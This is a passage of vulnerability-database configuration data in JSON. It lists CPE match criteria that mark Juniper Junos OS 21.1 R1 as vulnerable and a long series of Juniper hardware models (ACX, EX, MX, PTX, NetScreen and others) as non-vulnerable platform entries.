"cpe:2.3:o:juniper:junos:21.1:r1:*:*:*:*:*:*", "matchCriteriaId": "625BA7E6-D2AD-4A48-9B94-24328BE5B06A", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:juniper:acx1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "AF19CB03-4A42-48BC-A6E1-A6F56D40F422", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:acx1100:-:*:*:*:*:*:*:*", "matchCriteriaId": "648CB4A2-05FA-4445-BB4F-F9285A8E8A5D", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:acx2000:-:*:*:*:*:*:*:*", "matchCriteriaId": "90339191-4DE3-4116-8CEC-C5440D063CEE", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:acx2100:-:*:*:*:*:*:*:*", "matchCriteriaId": "E9F5683A-7DCC-4691-AD3A-F2B66684DA9C", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:acx2200:-:*:*:*:*:*:*:*", "matchCriteriaId": "154658D0-FE3E-43C1-8A4D-CAF67C9BCD98", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:acx4000:-:*:*:*:*:*:*:*", "matchCriteriaId": "76E2CDA9-2379-482C-B509-D527AFE2C7D5", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:acx500:-:*:*:*:*:*:*:*", "matchCriteriaId": "36729286-5080-47E8-A961-976BF64F5A93", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:acx5000:-:*:*:*:*:*:*:*", "matchCriteriaId": "4C398D8D-AD15-422C-90DE-2EAD9B9A7DF4", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:acx5048:-:*:*:*:*:*:*:*", "matchCriteriaId": "3F8DB691-C9F4-4084-8563-642A2F63DA86", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:acx5096:-:*:*:*:*:*:*:*", "matchCriteriaId": "44B58F51-4F0D-40BD-A90F-226A26F4646E", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:acx5400:-:*:*:*:*:*:*:*", "matchCriteriaId": "D013356B-A9FE-4301-BFEB-0D5B1AB3541D", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:acx5448:-:*:*:*:*:*:*:*", "matchCriteriaId": "2EB7B849-D1D4-46F3-B502-5D84C5E7C3B0", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:acx5800:-:*:*:*:*:*:*:*", "matchCriteriaId": "6D0730C3-5846-43E9-A9BD-8AEED356A959", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:acx6300:-:*:*:*:*:*:*:*", "matchCriteriaId": "6655453A-D027-41A3-B1E9-D40A5220E4CD", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:acx6360:-:*:*:*:*:*:*:*", "matchCriteriaId": "58626682-A25D-46B6-B2B3-493772FFBA11", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:acx710:-:*:*:*:*:*:*:*", "matchCriteriaId": "AC3484A2-C7E4-43D1-9D47-08C531185C67", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:atp400:-:*:*:*:*:*:*:*", "matchCriteriaId": "0A96949A-031D-4E05-8915-1A6D6BE645E0", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:atp700:-:*:*:*:*:*:*:*", "matchCriteriaId": "29D8A7A3-2DFB-4752-8509-451247A1D5D1", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:csrx:-:*:*:*:*:*:*:*", "matchCriteriaId": "11D4A86D-BDB4-4A01-96FE-7E023C58074B", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ctp150:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2DDF73E-3892-4CEF-A184-F337A8406A82", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ctp2008:-:*:*:*:*:*:*:*", "matchCriteriaId": "2F92815F-B287-4A00-8D15-B44B9B0CB551", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ctp2024:-:*:*:*:*:*:*:*", "matchCriteriaId": "22D4B48C-CA58-4FA0-B31B-4ED7D96F7D79", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ctp2056:-:*:*:*:*:*:*:*", "matchCriteriaId": "1D82E84B-2B79-47DE-9033-B6711382CE56", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:dx:-:*:*:*:*:*:*:*", "matchCriteriaId": "0ED6C49E-3AB5-4688-8BD7-0F9C274021F0", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:dx:5.1:*:*:*:*:*:*:*", "matchCriteriaId": "FF678F5C-F375-475C-BBEC-A4FC5F94AEFB", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex_rps:-:*:*:*:*:*:*:*", "matchCriteriaId": "42877394-A0A1-4136-A1D3-D287BFCC85E5", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex2200:-:*:*:*:*:*:*:*", "matchCriteriaId": "AE3D4F71-8476-4F0D-A976-A308D6483D6D", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex2200-c:-:*:*:*:*:*:*:*", "matchCriteriaId": "F7BD5636-93D5-4C06-964F-00055DF6B2B8", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex2200-vc:-:*:*:*:*:*:*:*", "matchCriteriaId": "D066A90D-F7F2-4EA5-8F0C-D0E189DDB05D", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex2300:-:*:*:*:*:*:*:*", "matchCriteriaId": "3B3302CB-457F-4BD2-B80B-F70FB4C4542E", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex2300-c:-:*:*:*:*:*:*:*", "matchCriteriaId": "979C3597-C53B-4F4B-9EA7-126DA036C86D", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex2300m:-:*:*:*:*:*:*:*", "matchCriteriaId": "62A536DA-5A57-4255-AB22-F99F8B7FF62A", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex3200:-:*:*:*:*:*:*:*", "matchCriteriaId": "4C7A20FC-A19F-4881-A0E8-C440E9FE60D0", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex3300:-:*:*:*:*:*:*:*", "matchCriteriaId": "FC326549-217D-4194-8310-AB398D6FF3F0", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex3300-vc:-:*:*:*:*:*:*:*", "matchCriteriaId": "D32B9B26-8BF0-4C56-A9BF-D9BBAEA50506", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex3400:-:*:*:*:*:*:*:*", "matchCriteriaId": "47DAF5E7-E610-4D74-8573-41C16D642837", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4200:-:*:*:*:*:*:*:*", "matchCriteriaId": "53269C69-3D1E-4F05-8EF6-81743D7A699E", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4200-vc:-:*:*:*:*:*:*:*", "matchCriteriaId": "E0F54ADF-7C13-4AA6-B61E-627D4DBB1CF3", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300:-:*:*:*:*:*:*:*", "matchCriteriaId": "E594D6DC-87F6-40D2-8268-ED6021462168", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-24p:-:*:*:*:*:*:*:*", "matchCriteriaId": "7BEA4BC3-093F-4DE6-BED1-2C7D2FC2C8A5", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-24p-s:-:*:*:*:*:*:*:*", "matchCriteriaId": "592377CC-4044-4FDD-A3DF-CBF25754EE4D", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-24t:-:*:*:*:*:*:*:*", "matchCriteriaId": "D12E8275-EF6B-44F9-A7D8-A769CDB5EED5", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-24t-s:-:*:*:*:*:*:*:*", "matchCriteriaId": "D3E63215-246E-49F3-A537-8A90D512DAB0", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-32f:-:*:*:*:*:*:*:*", "matchCriteriaId": "AD1A5E69-928A-41A0-8B9B-91F307D99854", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-32f-dc:-:*:*:*:*:*:*:*", "matchCriteriaId": "2B71953D-016D-4E72-B598-55667A507681", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-32f-s:-:*:*:*:*:*:*:*", "matchCriteriaId": "CABBC37B-EB93-424D-A1E7-4686039C0955", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-48mp:-:*:*:*:*:*:*:*", "matchCriteriaId": "24526B69-E3E3-4249-80A4-A886BED5C07E", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-48mp-s:-:*:*:*:*:*:*:*", "matchCriteriaId": "B2209605-65B6-44B3-9700-9EC543BF2408", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-48p:-:*:*:*:*:*:*:*", "matchCriteriaId": "C3C348CF-65C1-4A53-8F4F-99B5A4113679", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-48p-s:-:*:*:*:*:*:*:*", "matchCriteriaId": "60CB5F91-DC40-4D09-BB93-4539B8581877", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-48t:-:*:*:*:*:*:*:*", "matchCriteriaId": "ADE8EB69-95DD-44E9-80A6-F2B5E34BBD5B", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-48t-afi:-:*:*:*:*:*:*:*", "matchCriteriaId": "EEEDB14F-E74A-4C48-A969-1D22D7F7C7C8", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-48t-dc:-:*:*:*:*:*:*:*", "matchCriteriaId": "CBE3866E-109E-479F-9FFE-3F6E81C0DE7C", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-48t-dc-afi:-:*:*:*:*:*:*:*", "matchCriteriaId": "8A17D793-5F01-4818-956D-D6BC5A6C4CEE", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-48t-s:-:*:*:*:*:*:*:*", "matchCriteriaId": "EF4C3E8E-C8B4-42A5-8DB6-7E8114FCC030", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-48tafi:-:*:*:*:*:*:*:*", "matchCriteriaId": "77AF34EC-A154-4042-BE0B-B2BA9EEDEE93", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-48tdc:-:*:*:*:*:*:*:*", "matchCriteriaId": "E9FD3D9F-B49C-48EC-8AE1-FE3B399809DE", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-48tdc-afi:-:*:*:*:*:*:*:*", "matchCriteriaId": "10DC1840-7409-4BD0-9522-B55B1166CF9C", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-mp:-:*:*:*:*:*:*:*", "matchCriteriaId": "F9EECCB3-37B3-4146-8F8C-4BBFF84499E9", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300-vc:-:*:*:*:*:*:*:*", "matchCriteriaId": "303ADB06-5CB5-44DA-8387-39FACC539EF0", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4300m:-:*:*:*:*:*:*:*", "matchCriteriaId": "F07B0E0B-D2F2-4CF1-A8EA-A1E8DE83BBB4", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4400:-:*:*:*:*:*:*:*", "matchCriteriaId": "4B43F6CB-0595-4957-8B3B-ADD4EA84D8C2", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4500:-:*:*:*:*:*:*:*", "matchCriteriaId": "DDEE8AE4-B393-442C-AD68-4AC43E76A8F3", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4500-vc:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D842407-7A13-47C7-BBC9-FB0E978221CB", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4550:-:*:*:*:*:*:*:*", "matchCriteriaId": "D7E98077-92AF-4E3E-96F0-2E6F9D6343D9", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4550-vc:-:*:*:*:*:*:*:*", "matchCriteriaId": "0B84C72A-C314-46FB-8DD8-1DF29C6C4B0D", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4550\\/vc:-:*:*:*:*:*:*:*", "matchCriteriaId": "3612D798-7A5F-4068-A5A2-92173893450E", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4600:-:*:*:*:*:*:*:*", "matchCriteriaId": "D1BB20B5-EA30-4E8E-9055-2E629648436A", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4600-vc:-:*:*:*:*:*:*:*", "matchCriteriaId": "A3ECB975-D1A0-4318-9C5E-752A3C98F76F", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex4650:-:*:*:*:*:*:*:*", "matchCriteriaId": "2B425BB1-3C78-42B1-A6C1-216E514191F0", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex6200:-:*:*:*:*:*:*:*", "matchCriteriaId": "F6CC1C89-B37F-4C5F-9F79-12997C79711D", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex6210:-:*:*:*:*:*:*:*", "matchCriteriaId": "71FF88C7-89CB-4E04-BADA-AD64F8060C6C", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex8200:-:*:*:*:*:*:*:*", "matchCriteriaId": "4AFE829C-325D-4E66-A6A2-A81BE8BCAB72", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex8200-vc:-:*:*:*:*:*:*:*", "matchCriteriaId": "B74B12A6-1CE2-4293-ABA5-E3F23E15485C", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex8208:-:*:*:*:*:*:*:*", "matchCriteriaId": "72E67A5A-0DFF-42D9-81A7-570E9BCA463D", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex8216:-:*:*:*:*:*:*:*", "matchCriteriaId": "B51C5371-51E9-40AE-8619-BC1267DD1D08", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex9200:-:*:*:*:*:*:*:*", "matchCriteriaId": "D08A8D94-134A-41E7-8396-70D8B0735E9C", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex9204:-:*:*:*:*:*:*:*", "matchCriteriaId": "86E82CE3-F43D-4B29-A64D-B14ADB6CC357", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex9208:-:*:*:*:*:*:*:*", "matchCriteriaId": "13C0199E-B9F0-41D3-B625-083990517CDF", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex9214:-:*:*:*:*:*:*:*", "matchCriteriaId": "8790B456-DFC7-4E82-9A0C-C89787139B79", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex9250:-:*:*:*:*:*:*:*", "matchCriteriaId": "1CCB1E61-07A1-40B0-B616-F1A6E06D11C4", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex9251:-:*:*:*:*:*:*:*", "matchCriteriaId": "079290E9-DCC5-43F7-9480-64874DBF2696", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ex9253:-:*:*:*:*:*:*:*", "matchCriteriaId": "2EA71434-CCBF-4A55-8B30-D213A43E8641", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:fips_infranet_controller_6500:-:*:*:*:*:*:*:*", "matchCriteriaId": "F4B171E2-3E7D-42CE-8F16-0C232222EC63", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:fips_secure_access_4000:-:*:*:*:*:*:*:*", "matchCriteriaId": "80CC7A54-95DD-4C60-8A99-21F800616784", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:fips_secure_access_4500:-:*:*:*:*:*:*:*", "matchCriteriaId": "B68C4310-771E-4E8F-9C62-6EBE233FCB92", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:fips_secure_access_6000:-:*:*:*:*:*:*:*", "matchCriteriaId": "55331F37-6F9B-48A8-BBB3-BE9EBF4C2B3D", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:fips_secure_access_6500:-:*:*:*:*:*:*:*", "matchCriteriaId": "528028F3-3F3F-4354-A1D7-2EF66BA27CEC", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:gfx3600:-:*:*:*:*:*:*:*", "matchCriteriaId": "8A1587D9-B2C4-48E6-889E-D4AFB7154E47", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:idp250:-:*:*:*:*:*:*:*", "matchCriteriaId": "60A5EAF5-4E2C-4A5C-A4B8-6370490136AC", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:idp75:-:*:*:*:*:*:*:*", "matchCriteriaId": "0DD39F3D-8DD7-48DA-A8C2-543B8B05E50F", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:idp800:-:*:*:*:*:*:*:*", "matchCriteriaId": "567C7544-3C8B-468B-A2A1-0750B4623EA1", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:idp8200:-:*:*:*:*:*:*:*", "matchCriteriaId": "1AC3940A-9974-48AC-BEA6-66F1DC8D91DA", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:infranet_controller_4000:-:*:*:*:*:*:*:*", "matchCriteriaId": "D39E3026-7E64-4201-8801-5138C52EA3BE", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:infranet_controller_4500:-:*:*:*:*:*:*:*", "matchCriteriaId": "A1220A6C-A397-4BDD-A7D1-BF16BC35CE4A", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:infranet_controller_6000:-:*:*:*:*:*:*:*", "matchCriteriaId": "602D3D3E-6859-4E6D-AF61-D58D26C78E65", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:infranet_controller_6500:-:*:*:*:*:*:*:*", "matchCriteriaId": "4384E5A3-9D09-4340-943A-BB3408D85B8D", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:jatp:400:*:*:*:*:*:*:*", "matchCriteriaId": "A5723E51-E41D-4CBC-B433-C5D0845711C7", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:jatp:700:*:*:*:*:*:*:*", "matchCriteriaId": "EBC93060-DCEA-4181-A38B-653FB165D2C3", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:junos:-:*:*:*:*:*:*:*", "matchCriteriaId": "1EA2466C-D443-4A63-AA4F-1AE4EE5DA02A", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:junos_space_ja1500_appliance:-:*:*:*:*:*:*:*", "matchCriteriaId": "C58939FC-742F-4A93-8977-6953B32E6817", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:junos_space_ja2500_appliance:-:*:*:*:*:*:*:*", "matchCriteriaId": "D76C2611-F434-496C-8E30-4FA927223B81", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ln1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "19C2C35E-BE56-436B-A917-95B8C0BD6B41", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ln2600:-:*:*:*:*:*:*:*", "matchCriteriaId": "F11EE2D8-262D-44EC-B6A4-005C96AD5D06", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:m10i:-:*:*:*:*:*:*:*", "matchCriteriaId": "10374BF7-2AD3-483F-B3C1-950076934866", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:m120:-:*:*:*:*:*:*:*", "matchCriteriaId": "F5FB57F2-6135-49FF-8D33-13B55F7020CC", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:m320:-:*:*:*:*:*:*:*", "matchCriteriaId": "2FA6BB73-A778-414B-8A92-6CB6886A32D7", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:m7i:-:*:*:*:*:*:*:*", "matchCriteriaId": "DF6048CF-0BE2-4016-A95E-34799796014C", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mag2600_gateway:-:*:*:*:*:*:*:*", "matchCriteriaId": "1EE557B9-DF6D-4C20-98BE-E934D187CCFC", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mag4610_gateway:-:*:*:*:*:*:*:*", "matchCriteriaId": "DB174F88-B643-4338-BCD6-A9CD0EDB54A6", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mag6610_gateway:-:*:*:*:*:*:*:*", "matchCriteriaId": "115C8834-8BD1-4561-8B98-AE29E3B9C1C9", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mag6611_gateway:-:*:*:*:*:*:*:*", "matchCriteriaId": "54C5F933-61BB-40EA-9ADC-C22CFE8F9D1B", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mx:-:*:*:*:*:*:*:*", "matchCriteriaId": "72952BFC-45B9-4379-8D9A-A10132CC34EF", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mx10:-:*:*:*:*:*:*:*", "matchCriteriaId": "52699E2B-450A-431C-81E3-DC4483C8B4F2", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mx10000:-:*:*:*:*:*:*:*", "matchCriteriaId": "D97AF6F8-3D50-4D35-BCB1-54E3BEC69B9F", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mx10003:-:*:*:*:*:*:*:*", "matchCriteriaId": "D5627740-42E3-4FB1-B8B9-0B768AFFA1EC", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mx10008:-:*:*:*:*:*:*:*", "matchCriteriaId": "D6F0EA2F-BF7E-45D0-B2B4-8A7B67A9475A", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mx10016:-:*:*:*:*:*:*:*", "matchCriteriaId": "C39DA74D-F5C7-4C11-857D-50631A110644", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mx104:-:*:*:*:*:*:*:*", "matchCriteriaId": "F72C850A-0530-4DB7-A553-7E19F82122B5", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mx150:-:*:*:*:*:*:*:*", "matchCriteriaId": "7FE2089C-F341-4DC1-B76D-633BC699306D", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mx2008:-:*:*:*:*:*:*:*", "matchCriteriaId": "2FEF33EB-B2E0-42EF-A1BB-D41021B6D08F", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mx2010:-:*:*:*:*:*:*:*", "matchCriteriaId": "27175D9A-CA2C-4218-8042-835E25DFCA43", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mx2020:-:*:*:*:*:*:*:*", "matchCriteriaId": "00C7FC57-8ACF-45AA-A227-7E3B350FD24F", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mx204:-:*:*:*:*:*:*:*", "matchCriteriaId": "2754C2DF-DF6E-4109-9463-38B4E0465B77", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mx240:-:*:*:*:*:*:*:*", "matchCriteriaId": "F4A26704-A6A4-4C4F-9E12-A0A0259491EF", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mx40:-:*:*:*:*:*:*:*", "matchCriteriaId": "C982A2FF-A1F9-4830-BAB6-77CFCE1F093F", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mx480:-:*:*:*:*:*:*:*", "matchCriteriaId": "104858BD-D31D-40E0-8524-2EC311F10EAC", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mx5:-:*:*:*:*:*:*:*", "matchCriteriaId": "3B557965-0040-4048-B56C-F564FF28635B", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mx80:-:*:*:*:*:*:*:*", "matchCriteriaId": "EB875EBD-A3CD-4466-B2A3-39D47FF94592", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:mx960:-:*:*:*:*:*:*:*", "matchCriteriaId": "B5E08E1E-0FE4-4294-9497-BBFFECA2A220", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:netscreen-5200:-:*:*:*:*:*:*:*", "matchCriteriaId": "A658500D-84C8-4F33-9AD3-2DF76DC41459", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:netscreen-5400:-:*:*:*:*:*:*:*", "matchCriteriaId": "3F2B4E7A-30F3-488E-A685-7CBF998C7E9F", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:netscreen-5gt:-:*:*:*:*:*:*:*", "matchCriteriaId": "AFCCC02F-48ED-469D-808A-B17810A6E5C9", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:netscreen-5gt:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "A482DFA5-4108-4B0F-BD8E-04FEB52D3537", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:netscreen-idp:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "3B97B63E-CE45-4DF9-9838-D9CE96CECE72", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:netscreen-idp:3.0r1:*:*:*:*:*:*:*", "matchCriteriaId": "EE5F6D51-15B0-449D-9418-8C4C7A1E1D7B", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:netscreen-idp:3.0r2:*:*:*:*:*:*:*", "matchCriteriaId": "C696E607-0927-4087-A437-9C5459EB8BE5", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:netscreen-idp_10:-:*:*:*:*:*:*:*", "matchCriteriaId": "A9C332A8-746C-4FC8-84E3-D67C8C3D377A", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:netscreen-idp_100:-:*:*:*:*:*:*:*", "matchCriteriaId": "2F6C2728-2D68-498A-A6F1-39DBEFABB1B2", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:netscreen-idp_1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "44AF925F-DF8C-456E-A61E-E94C5CED5A7D", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:netscreen-idp_500:-:*:*:*:*:*:*:*", "matchCriteriaId": "1C5D2B14-E517-4229-BB16-A1B8E5436959", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:nfx:-:*:*:*:*:*:*:*", "matchCriteriaId": "322C5D3F-ADE3-417D-9355-187C9648ED1D", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:nfx150:-:*:*:*:*:*:*:*", "matchCriteriaId": "D9AE81FA-B0F3-4F0B-A2D1-2BB590345058", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:nfx250:-:*:*:*:*:*:*:*", "matchCriteriaId": "7EB08A27-7777-4538-ADC4-9D2F89963C13", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:nfx350:-:*:*:*:*:*:*:*", "matchCriteriaId": "6CB56048-A486-4A46-B438-CC3084BD9CB6", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:nsm3000:-:*:*:*:*:*:*:*", "matchCriteriaId": "1DD754FD-CC22-47BA-A2A7-4835CC8E55E0", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:nsmexpress:-:*:*:*:*:*:*:*", "matchCriteriaId": "9E5B7D06-3E72-49C1-9ABA-7BD68860C1F7", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ocx1100:-:*:*:*:*:*:*:*", "matchCriteriaId": "290BA886-8174-4F62-A72C-D50BFDB7FDA5", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ptx1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "0E6DF99D-E438-4943-BC32-F2821E72AE0B", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ptx1000-72q:-:*:*:*:*:*:*:*", "matchCriteriaId": "B219F54A-4474-48CB-80F1-D988A719C3DA", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ptx10000:-:*:*:*:*:*:*:*", "matchCriteriaId": "249F6266-4ED6-4464-9347-9322E1481D0D", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ptx10001:-:*:*:*:*:*:*:*", "matchCriteriaId": "6CDCCB33-D428-4D64-977E-71C62F89AE5A", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ptx10001-36mr:-:*:*:*:*:*:*:*", "matchCriteriaId": "C188428C-0558-44FB-845C-E885DE9A0733", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ptx100016:-:*:*:*:*:*:*:*", "matchCriteriaId": "37F94757-34CE-4F88-A6D3-544FE6A476D5", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ptx10002:-:*:*:*:*:*:*:*", "matchCriteriaId": "82B22AC2-B794-4F12-9EB3-9AA6E4B19831", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ptx10002-60c:-:*:*:*:*:*:*:*", "matchCriteriaId": "1B5462DF-5CF1-4DF9-989B-622EA734964F", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ptx10003:-:*:*:*:*:*:*:*", "matchCriteriaId": "5BD05415-9F94-4EB8-805A-C9C0FFA9D0DF", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ptx10003_160c:-:*:*:*:*:*:*:*", "matchCriteriaId": "B1E88A41-B158-4A66-9DFD-438931C6BE68", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ptx10003_80c:-:*:*:*:*:*:*:*", "matchCriteriaId": "2C97FFB5-8755-474B-ABCF-98DC7659208E", "vulnerable": false }, { "criteria": "cpe:2.3:h:juniper:ptx10003_81cd:-:*:*:*:*:*:*:*", "matchCriteriaId": "FAECB1BF-0F3A-4AD9-AF6B-E54A13D9D804", "vulnerable": false }, { "criteria": 